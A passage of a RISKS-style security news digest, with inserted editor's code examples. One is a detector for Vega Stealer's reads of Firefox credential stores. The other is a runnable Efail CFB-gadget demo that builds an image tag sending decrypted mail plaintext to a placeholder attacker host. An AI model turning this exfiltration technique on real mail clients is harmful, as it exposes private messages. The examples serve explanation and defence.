    performed by a non-profit? Or a university? Does the entity reporting the
    study's results receive funding from the device manufacturer? Do any of the
    study's authors disclose industry ties? If so, a report that is published
    might possess skewed findings. Is the raw data from these studies available
    for inspection? If so, try to find a consultant to review it for you and
    render an opinion. Will the device manufacturer share their software and
    system test plans for inspection? If so, try to locate a person "skilled in
    the art of embedded software test" to evaluate the test plan, and the
    firmware test results released with the implanted device. Try to gain access
    to the manufacturer's defect tracking system to explore defect density and
    discovery rates and repair history.

    Does the device have a special mechanism to disable it, should it misbehave?
    If so, try to learn about how this is accomplished and ensure there are
    backup sources -- other physicians or facilities that possess this
    mechanism.

    How many implants have been performed in the past year? How many
    patient deaths occurred post-implantation? Never mind whether the deaths
    were attributed to the device or not; find the raw count of deaths.

    For each post-implant death, was an FDA MAUDE report filed? How many of
    these reports were filed by medical practitioners? How many by the device
    manufacturer? Confront the salesperson to learn why, or if, there's a huge
    discrepancy between the number of deaths and the number of FDA MAUDE reports
    they or practitioners reported. That discrepancy is apparently a clue that
    the manufacturer is or has concealed important evidence about device
    capability or side-effects that can injure or kill you.

    Has the device been the subject of prior recalls? If so, why? Has the
    manufacturer been sued for product liability previously? Are they currently
    under litigation for liability? These questions can provide insight into
    their organization's maturity and ability to pro-actively act on
    lessons-learned.

    Is the device implantation under consideration being applied for "an
    off-label" application in your case? If so, why?

    ------------------------------

    Date: Fri, 18 May 2018 09:24:59 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)

    Liam Tung | 18 May 2018
    Ex-Intel security expert: This new Spectre attack can even reveal firmware secrets | ZDNet

    Ex-Intel security expert: This new Spectre attack can even reveal firmware
    secrets; A new variant of Spectre can expose the contents of memory that
    normally can't be accessed by the OS kernel.

    opening text:

    Yuriy Bulygin, the former head of Intel's advanced threat team, has
    published research showing that the Spectre CPU flaws can be used to break
    into the highly privileged CPU mode on Intel x86 systems known as System
    Management Mode (SMM).

    ------------------------------

    Date: Wed, 16 May 2018 09:11:51 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)

    This malware is harvesting saved credentials in Chrome, Firefox browsers | ZDNet

    This malware is harvesting saved credentials in Chrome, Firefox browsers
    Researchers say the new Vega Stealer malware is currently being used
    in a simple campaign but has the potential to go much further.
    By Charlie Osborne for Zero Day | May 14, 2018 -- 07:42 GMT (00:42
    PDT) | Topic: Security

    selected text:

    Vega Stealer is also written in .NET and focuses on the theft of
    saved credentials and payment information in Google Chrome. These
    credentials include passwords, saved credit cards, profiles, and cookies.

    When the Firefox browser is in use, the malware harvests specific
    files -- "key3.db" "key4.db", "logins.json", and "cookies.sqlite" --
    which store various passwords and keys.

    However, Vega Stealer does not wrap up there. The malware also takes
    a screenshot of the infected machine and scans for any files on the
    system ending in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf for
    exfiltration.

    According to the security researchers, the malware is currently being
    utilized to target businesses in marketing, advertising, public
    relations, retail, and manufacturing.

    ------------------------------
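
    Editor's added example for the Vega Stealer item above, not code from ZDNet
    or from the researchers: detection logic, run over constructed file-access
    telemetry, for the two behaviours the article names, a non-browser process
    reading the Firefox credential store files (key3.db, key4.db, logins.json,
    cookies.sqlite) and one process sweeping many .doc/.docx/.txt/.rtf/.xls/
    .xlsx/.pdf files in a short window. The article does not name the Chrome
    profile files, so the credential rule sticks to Firefox. The event format
    (timestamp, process, path), the allowed-reader list, the threshold and
    window, and the process names in the sample are all assumptions for the
    example.

```python
"""Added example: detection logic for the two file-access behaviours the
article attributes to Vega Stealer. Not code from the article or the
researchers; the telemetry format and sample events are constructed."""
import os
from collections import defaultdict

# Firefox profile files the article says the malware harvests.
FIREFOX_SECRET_FILES = {"key3.db", "key4.db", "logins.json", "cookies.sqlite"}
# Extensions the article says it sweeps for exfiltration.
DOC_EXTENSIONS = {".doc", ".docx", ".txt", ".rtf", ".xls", ".xlsx", ".pdf"}
# Assumption: the only processes expected to open the Firefox credential store.
ALLOWED_READERS = {"firefox.exe", "firefox"}
SWEEP_THRESHOLD = 5   # distinct document files read by one process ...
WINDOW_SECONDS = 60   # ... within this sliding window (assumed tuning values)


def _basename(path: str) -> str:
    # Handle both Windows and POSIX separators regardless of the host OS.
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def analyze(events):
    """events: iterable of (timestamp_seconds, process_name, path) file reads,
    in time order. Returns a list of (rule, process, detail) alerts."""
    alerts = []
    recent_docs = defaultdict(list)          # process -> [(ts, path), ...]
    for ts, proc, path in events:
        name = _basename(path).lower()
        ext = os.path.splitext(name)[1]
        # Rule 1: anything but the browser reading its password/cookie stores.
        if name in FIREFOX_SECRET_FILES and proc.lower() not in ALLOWED_READERS:
            alerts.append(("firefox_credential_store_read", proc, path))
        # Rule 2: one process sweeping many distinct documents in a short window.
        if ext in DOC_EXTENSIONS:
            hist = recent_docs[proc]
            while hist and ts - hist[0][0] > WINDOW_SECONDS:   # expire old reads
                hist.pop(0)
            already_seen = any(p == path for _, p in hist)
            hist.append((ts, path))
            distinct = {p for _, p in hist}
            # Fire once, when a new file pushes the count over the bar.
            if not already_seen and len(distinct) == SWEEP_THRESHOLD:
                alerts.append(("document_sweep", proc,
                               f"{len(distinct)} document files in {WINDOW_SECONDS}s"))
    return alerts


# Constructed sample telemetry: normal user activity, then a stealer (called
# update.exe here, a made-up name) doing both things within a few seconds.
PROFILE = r"C:\Users\ann\AppData\Roaming\Mozilla\Firefox\Profiles\x1.default"
SAMPLE_EVENTS = [
    (0,  "firefox.exe", PROFILE + r"\logins.json"),
    (5,  "winword.exe", r"C:\Users\ann\Documents\q2-forecast.docx"),
    (30, "update.exe",  PROFILE + r"\key4.db"),
    (30, "update.exe",  PROFILE + r"\logins.json"),
    (31, "update.exe",  PROFILE + r"\cookies.sqlite"),
    (32, "update.exe",  r"C:\Users\ann\Documents\q2-forecast.docx"),
    (32, "update.exe",  r"C:\Users\ann\Documents\contracts.pdf"),
    (33, "update.exe",  r"C:\Users\ann\Documents\notes.txt"),
    (33, "update.exe",  r"C:\Users\ann\Documents\budget.xlsx"),
    (34, "update.exe",  r"C:\Users\ann\Desktop\memo.rtf"),
    (35, "update.exe",  r"C:\Users\ann\Desktop\memo.rtf"),   # repeat, not a new file
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

    The credential-store rule is the higher-confidence one: almost nothing
    other than the browser has a legitimate reason to open logins.json or
    key4.db, so it can alert on a single event. The sweep rule needs a
    threshold because office software and indexers read documents constantly;
    the knob to tune is distinct files per process per window, and the rule
    fires once when that bar is crossed rather than on every later read.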

    Date: Wed, 23 May 2018 18:07:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)

    Charlie Osborne for Zero Day | 22 May 2018
    Student awarded $36,000 for remote execution flaw in Google App Engine | ZDNet
    The discovery was made by a university student who was not aware of
    how dangerous the vulnerability was.

    opening text:

    Google has awarded a young cybersecurity researcher $36,337 for disclosing a
    severe vulnerability in the Google App Engine.

    The 18-year-old student from Uruguay's University of the Republic discovered
    a critical remote code execution (RCE) bug in the system, which is a
    framework and cloud platform used for the hosting and development of web
    applications in Google data centers.

    ------------------------------

    Date: Fri, 18 May 2018 09:05:54 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This cryptocurrency phishing attack uses new trick to drain
    wallets" (Danny Palmer)

    Danny Palmer | 17 May 2018
    This cryptocurrency phishing attack uses new trick to drain wallets | ZDNet

    This cryptocurrency phishing attack uses new trick to drain wallets
    Campaign uses automation to empty cryptocurrency wallets and produce
    lucrative returns.

    ... the phishing campaign mimics the front end of the MyEtherWallet website
    for the purpose of stealing credentials, while also deploying what the
    authors call an "automated transfer system" to process the details captured
    by the fake page and transfer funds.

    The attack injects scripts into active web sessions and silently and
    invisibly executes bank transfers just seconds after the user logs
    into their cryptocurrency account.

    Researchers note that MyEtherWallet is an appealing target for attackers
    because it is simple to use, but its lack of security compared to other
    banks and exchanges makes it a prominent target for attack.

    After that, the crooks look to drain accounts when the victim decrypts their
    wallet. The scam uses scripts which automatically create the fund transfer
    by pressing the buttons like a legitimate user would, all while the activity
    remains hidden -- it's the first time an attack has been seen to use this
    automated tactic.

    ------------------------------

    Date: Wed, 16 May 2018 16:47:10 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)

    Baldet, who most recently served as the bank’s blockchain program lead, is
    cofounding a new startup, Clovyr, that aims to help consumers, developers,
    and businesses explore the nascent, albeit burgeoning, world of
    blockchain-based, decentralized technologies, she tells Fortune. She is
    joined by Nielsen, former lead developer of Quorum, a JPMorgan Chase-built
    blockchain for business, who will serve as the concern’s chief technologist.

    Baldet unveiled a Clovyr demo at the Consensus conference in Manhattan on
    Monday afternoon. The company is in the process of fundraising.

    Clovyr's product, now under development, is slated to take the form of
    something akin to an app store, where people and businesses can experiment
    with a multitude of decentralized apps and services, developer toolsets, and
    underlying distributed ledgers. The cofounders envision the platform serving
    as a neutral ground, offering a browser-like dashboard for the
    blockchain-curious, through which Clovyr can provide support and other
    services to customers according to their needs.

    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup

    Just what consumers need. What could go wrong? Also, what's with the "Clovyr"
    name?

    ------------------------------

    Date: Thu, 17 May 2018 16:48:50 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: ICE abandons its dream of ‘extreme vetting’ software that could
    predict whether a foreign visitor would become a terrorist (WashPo)

    Immigration officials originally wanted artificial intelligence that could
    continuously track foreign visitors' social media. They're giving the job to
    humans instead.

    ICE just abandoned its dream of ‘extreme vetting’ software that could predict whether a foreign visitor would become a terrorist

    ------------------------------

    Date: Thu, 17 May 2018 15:10:11 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: E-Mail Clients are Insecure, PGP and S/MIME 100% secure

    There is no "security" problem with either PGP or S/MIME encrypted and
    signed messages. The problem is, as it has been since the introduction of
    the ability to embed executable code into e-mail messages (aka, Web Pages
    and Rich Text via SMTP), the shoddy and useless security state of almost all
    e-mail clients.

    If you turn off the [expletive deleted] (HTML code execution, etc) then
    there is no problem. In other words, the only problem that exists is that
    which you created yourself. So if you do something utterly stupid, you
    deserve whatever you get in return.

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    Stop Using Common Email Encryption Tools Immediately, Researchers Warn

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    http://www.eff.org/deeplinks/2018/05/not-so-pretty-what-you-need-know-about-e-fail-and-pgp-flaw-0

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community of the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now. Because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/

    ------------------------------
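
    Editor's added example for the EFF item above, not code from the EFF post
    or from the Efail paper: the CFB "gadget" behind the second attack the
    post describes, on a deliberately simplified OpenPGP-style message. The
    attacker holds a ciphertext, knows one plaintext block (the MIME header an
    encrypted mail body predictably starts with), and uses only that to wrap
    the encrypted body in <img src="//a.x/ ... ">, so that a client which
    decrypts and then renders HTML fetches the whole plaintext as a URL.
    Assumptions: HMAC-SHA256 stands in for the block cipher's forward
    direction (CFB never uses the inverse, so the malleability is identical
    to AES), plain CFB rather than OpenPGP's resynchronising variant, a
    trailing SHA-1 as the integrity check instead of the real MDC packet
    framing, and a.x as a placeholder attacker host. The
    render_on_mdc_failure flag models the client behaviour the EFF text
    describes: a strict client shows nothing when the check fails, a lax one
    shows the message anyway.

```python
"""Added example: the CFB "gadget" behind the second Efail attack, on a
simplified OpenPGP-style message. Not code from the EFF post or the paper."""
import hashlib
import hmac
import os

BLOCK = 16     # cipher block size in bytes (AES-sized)
MDC_LEN = 20   # OpenPGP's Modification Detection Code is a SHA-1 digest


def prf_block(key: bytes, block: bytes) -> bytes:
    # Assumption: HMAC-SHA256 truncated to one block stands in for the block
    # cipher's forward direction E_k. CFB mode only ever calls E_k (never the
    # inverse), so any keyed PRF shows the same malleability as AES would.
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def cfb_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    # C_i = E_k(C_{i-1}) XOR P_i, with C_0 = IV (plain CFB; OpenPGP's
    # resync quirk is omitted, it does not change the attack).
    out, prev = bytearray(), iv
    for i in range(0, len(pt), BLOCK):
        c = xor(prf_block(key, prev), pt[i:i + BLOCK])
        out += c
        prev = c
    return bytes(out)


def cfb_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    # P_i = E_k(C_{i-1}) XOR C_i: each block depends only on the block before it.
    out, prev = bytearray(), iv
    for i in range(0, len(ct), BLOCK):
        c = ct[i:i + BLOCK]
        out += xor(prf_block(key, prev), c)
        prev = c
    return bytes(out)


def seal(key: bytes, iv: bytes, body: bytes) -> bytes:
    # Simplified MDC: SHA-1 of the body is appended and encrypted with it.
    return cfb_encrypt(key, iv, body + hashlib.sha1(body).digest())


def cfb_gadget(iv: bytes, ct: bytes, j: int, known_pt: bytes, chosen: bytes) -> bytes:
    """Ciphertext blocks that decrypt to `chosen` (space-padded to whole
    blocks), each preceded by one block of junk. Needs only one known
    plaintext block P_j and the ciphertext; the key is never used."""
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    c_prev, c_j = blocks[j], blocks[j + 1]       # C_{j-1}, C_j
    keystream = xor(c_j, known_pt)               # = E_k(C_{j-1})
    chosen += b" " * (-len(chosen) % BLOCK)
    out = b""
    for i in range(0, len(chosen), BLOCK):
        # C_{j-1} placed first makes the client compute E_k(C_{j-1}) for the
        # block after it, which then decrypts to keystream XOR (keystream XOR X) = X.
        out += c_prev + xor(keystream, chosen[i:i + BLOCK])
    return out


def client_decrypt(key: bytes, iv: bytes, ct: bytes, render_on_mdc_failure: bool):
    """Return (body, mdc_ok). A lax client returns the body even when the
    integrity check fails, which is the behaviour the EFF text describes."""
    pt = cfb_decrypt(key, iv, ct)
    body, tag = pt[:-MDC_LEN], pt[-MDC_LEN:]
    ok = hmac.compare_digest(hashlib.sha1(body).digest(), tag)
    if not ok and not render_on_mdc_failure:
        return None, False
    return body, ok


def demo():
    key, iv = os.urandom(BLOCK), os.urandom(BLOCK)   # unknown to the attacker
    # Constructed secret; length chosen so body + MDC is block-aligned.
    secret = b"Content-Type: text/plain\r\n\r\nthe safe combination is 31-41-59"
    ct = seal(key, iv, secret)
    assert len(ct) % BLOCK == 0
    known = secret[:BLOCK]          # MIME header: guessable, plaintext block 0
    prefix = b'<img src="//a.x/'   # exactly one block; a.x is a placeholder host
    suffix = b'">' + b" " * 30      # padded so the quote lands before the MDC slot
    # Attacker's message: gadget(prefix) || IV || original || gadget(suffix).
    # Re-inserting IV as a block keeps C_1 decrypting correctly; IV itself
    # becomes one more junk block. The victim decrypts with the same IV.
    evil = (cfb_gadget(iv, ct, 0, known, prefix) + iv + ct
            + cfb_gadget(iv, ct, 0, known, suffix))
    honest_body, honest_ok = client_decrypt(key, iv, ct, False)
    strict_body, strict_ok = client_decrypt(key, iv, evil, False)
    lax_body, lax_ok = client_decrypt(key, iv, evil, True)
    return {"secret": secret, "honest": (honest_body, honest_ok),
            "strict": (strict_body, strict_ok), "lax": (lax_body, lax_ok)}


if __name__ == "__main__":
    r = demo()
    print("strict client shows:", r["strict"])
    print("lax client renders:", r["lax"][0])
```

    Two things follow from the demo. The gadget never touches the key, so key
    size and cipher choice are irrelevant; what closes it is an integrity
    check that the client actually enforces, refusing to render when it fails
    and refusing messages that carry no check at all. And because the
    standard allowed messages without the check, and the check can be
    stripped, a client that merely warns on MDC failure and shows the text
    anyway is, for this attack, the same as a client with no check.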

    Date: Thu, 24 May 2018 18:24:24 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 24 May 2018

    http://www.zdnet.com/article/tmobile-bug-let-anyone-see-any-customers-account-details/

    T-Mobile bug let anyone see any customer's account details
    Exclusive: The exposed lookup tool let anyone run a customer's phone number
    -- and obtain their home address and account PIN, used to contact phone
    support.

    selected text:

    A bug in T-Mobile's website let anyone access the personal account details
    of any customer with just their cell phone number.

    The flaw, since fixed, could have been exploited by anyone who knew where to
    look -- a little-known T-Mobile subdomain that staff use as a customer care
    portal to access the company's internal tools.

    Although the API is understood to be used by T-Mobile staff to look up
    account details, it wasn't protected with a password and could be easily
    used by anyone.

    The returned data included a customer's full name, postal address, billing
    account number, and in some cases information about tax identification
    numbers. The data also included customers' account information, such as if
    a bill is past-due or if the customer had their service suspended.

    The data also included references to account PINs used by customers as a
    security question when contacting phone support. Anyone could use that
    information to hijack accounts.

    [Gene also contributed a previous item from Zack Whittaker on 17 May
    on the same subject:
    http://www.zdnet.com/article/cell-p...ed-millions-of-americans-real-time-locations/
    I think the more recent one suffices here. PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:27:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Senator wants to know how police can locate any phone in
    seconds without a warrant" (Zack Whittaker)

    Zack Whittaker for Zero Day | May 11, 2018
    http://www.zdnet.com/article/securus-police-cell-phones-warrantless-tracking/

    Senator wants to know how police can locate any phone in seconds without a
    warrant. Real-time location data was accessible by police under "the legal
    equivalent of a pinky promise," said a senator who is demanding that the FCC
    investigate why a company, contracted to monitor calls of prison inmates,
    also allows police to track phones of anyone in the US without a warrant.

    The bombshell story in *The New York Times* revealed Securus, a Texas-based
    prison technology company, could track any phone "within seconds" by
    obtaining data from cellular giants -- including AT&T, Sprint, T-Mobile, and
    Verizon -- typically reserved for marketers.

    ------------------------------

    Date: Fri, 18 May 2018 09:29:13 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "US cell carriers are selling access to your real-time phone
    location data" (Zack Whittaker)

    Zack Whittaker, Zero Day, 14 May 2018
    http://www.zdnet.com/article/us-cell-carriers-selling-access-to-real-time-location-data/

    US cell carriers are selling access to your real-time phone location data
    The company embroiled in a privacy row has "direct connections" to all major
    US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint -- and
    Canadian cell networks, too.

    Four of the largest cell giants in the US are selling your real-time
    location data to a company that you've probably never heard about before.

    In case you missed it, a senator last week sent a letter demanding the
    Federal Communications Commission (FCC) investigate why Securus, a prison
    technology company, can track any phone "within seconds" by using data
    obtained from the country's largest cell giants, including AT&T, Verizon,
    T-Mobile, and Sprint, through an intermediary, LocationSmart.

    ------------------------------

    Date: Sat, 19 May 2018 07:36:23 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Hundreds of Apps Can Empower Stalkers to Track Their Victims
    (The New York Times)

    http://mobile.nytimes.com/2018/05/19/technology/phone-apps-stalking.html

    'KidGuard is a phone app that markets itself as a tool for keeping tabs on
    children. But it has also promoted its surveillance for other purposes and
    run blog posts with headlines like *How to Read Deleted Texts on Your
    Lover's Phone.*

    'A similar app, mSpy, offered advice to a woman on secretly monitoring her
    husband. Still another, Spyzie, ran ads on Google alongside results for
    search terms like *catch cheating girlfriend iPhone*.

    'As digital tools that gather cellphone data for tracking children,
    friends or lost phones have multiplied in recent years, so have the
    options for people who abuse the technology to track others without
    consent.'

    Surveillance capitalism is booming. These apps are e^(to the creepy).

    ------------------------------

    Date: Fri, 18 May 2018 15:06:20 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home
    into secret eavesdroppers" (CSO Online)

    http://www.csoonline.com/article/32...xa-google-home-into-secret-eavesdroppers.html

    Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into secret
    eavesdroppers. Researchers devise two new attacks -- voice squatting
    and voice masquerading -- on Amazon Alexa and Google Home, allowing
    adversaries to steal personal information or silently eavesdrop.

    Ms. Smith, CSO | 17 May 2018

    Ms. Smith (not her real name) is a freelance writer and programmer with a
    special and somewhat personal interest in IT privacy and security issues.

    opening text:

    Oh, goody, Amazon Alexa and/or Google Home could be hit with remote,
    large-scale "voice squatting" and "voice masquerading" attacks to steal
    sensitive user information or eavesdrop on conversations.

    ------------------------------

    Date: Fri, 18 May 2018 17:56:12 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: So, Umm, Google Duplex's Chatter Is Not Quite Human
    (Scientific American)

    http://www.scientificamerican.com/article/so-umm-google-duplexs-chatter-is-not-quite-human/

    "Google’s Duplex voice assistant drew applause last week at the company’s
    annual I/O developer conference after CEO Sundar Pichai demonstrated the
    artificially intelligent technology autonomously booking a hair salon
    appointment and a restaurant reservation, apparently fooling the people
    who took the calls. But enthusiasm has since been tempered with unease
    over the ethics of a computer making phone calls under the guise of being
    human. Such a mixed reception has become increasingly common for Google,
    Amazon, Facebook and other tech companies as they push AI's boundaries in
    ways that do not always seem to consider consumer privacy or safety
    concerns."

    ------------------------------

    Date: Fri, 18 May 2018 08:27:18 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence
    (The Wrap)

    via NNSquad
    http://www.thewrap.com/henry-kissinger-is-scared-of-unstable-artificial-intelligence/

    The former U.S. secretary of state is warning against the threat of
    "unstable" artificial intelligence in a new essay in The Atlantic --
    fearing the rapid rise of machines could lead to questions humanity is not
    ready to tackle.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:25 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Fri, 18 May 2018 17:53:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)

    http://www.scientificamerican.com/article/gunshot-sensors-pinpoint-destructive-fish-bombs/

    "Rogue fishers around the world toss explosives into the sea and scoop up
    bucketloads of stunned or dead fish, an illegal practice in many nations
    that can destroy coral reefs and wreak havoc on marine biodiversity.
    Catching perpetrators amid the vastness of the ocean has long proved
    almost impossible, but researchers working in Malaysia have now adapted
    acoustic sensors—originally used to locate urban gunfire—to pinpoint these
    marine blasts within tens of meters."

    Example of dual-use technology for public and environmental safety
    maintenance.

    ------------------------------

    Date: Mon, 21 May 2018 12:04:35 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Most GDPR emails unnecessary and some illegal, say experts
    (The Guardian)

    NNSquad
    http://www.theguardian.com/technolo...cessary-and-in-some-cases-illegal-say-experts

    The vast majority of emails flooding inboxes across Europe from companies
    asking for consent to keep recipients on their mailing list are
    unnecessary and some may be illegal, privacy experts have said, as new
    rules over data privacy come into force at the end of this week.

    AND EVEN WORSE: "Warning: New European Privacy Law Has Become a
    Jackpot for Internet Crooks" -

    http://lauren.vortex.com/2018/05/01...-law-has-become-a-jackpot-for-internet-crooks

    ------------------------------

    Date: Wed, 23 May 2018 13:58:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Pentagon Has a Big Plan to Solve Identity Verification in
    Two Years (Defense One)

    The plan grew out of efforts to modernize the Defense Department's ID cards.

    The Defense Department is funding a project that officials say could
    revolutionize the way companies, federal agencies and the military itself
    verify that people are who they say they are and it could be available in
    most commercial smartphones within two years.

    The technology, which will be embedded in smartphones’ hardware, will
    analyze a variety of identifiers that are unique to an individual, such as
    the hand pressure and wrist tension when the person holds a smartphone and
    the person’s peculiar gait while walking, said Steve Wallace, technical
    director at the Defense Information Systems Agency.

    Organizations that use the tool can combine those identifiers to give the
    phone holder a “risk score,” Wallace said. If the risk score is low enough,
    the organization can presume the person is who she says she is and grant her
    access to sensitive files on the phone or on a connected computer or grant
    her access to a secure facility. If the score’s too high, she’ll be locked
    out.

    http://www.defenseone.com/technolog...solve-identity-verification-two-years/148280/

    ------------------------------

    Date: Thu, 24 May 2018 17:41:32 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Unplug Your Echo! (Ars Technica)

    [Thanks to Phil Porras]
    http://arstechnica.com/gadgets/2018...o-device-secretly-shared-users-private-audio/

    Amazon confirmed an Echo owner's privacy-sensitive allegation on Thursday,
    after Seattle CBS affiliate KIRO-7 reported that an Echo device in Oregon
    sent private audio to someone on a user's contact list without permission.
    ...."Unplug your Alexa devices right now," the user, Danielle (no last name
    given), was told by her husband's colleague in Seattle after he received
    full audio recordings between her and her husband, according to the KIRO-7
    report. The disturbed owner, who is shown in the report juggling four
    unplugged Echo Dot devices, said that the colleague then sent the offending
    audio to Danielle and her husband to confirm the paranoid-sounding
    allegation. (Before sending the audio, the colleague confirmed that the
    couple had been talking about hardwood floors.)

    After calling Amazon customer service, Danielle said she received the
    following explanation and response: "'Our engineers went through all of your
    logs. They saw exactly what you told us, exactly what you said happened, and
    we're sorry.' He apologized like 15 times in a matter of 30 minutes. 'This
    is something we need to fix.'" ... Ya think?

    ------------------------------

    Date: Tue, 22 May 2018 18:15:53 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: FBI dramatically overstates how many phones they can't get into (WaPo)

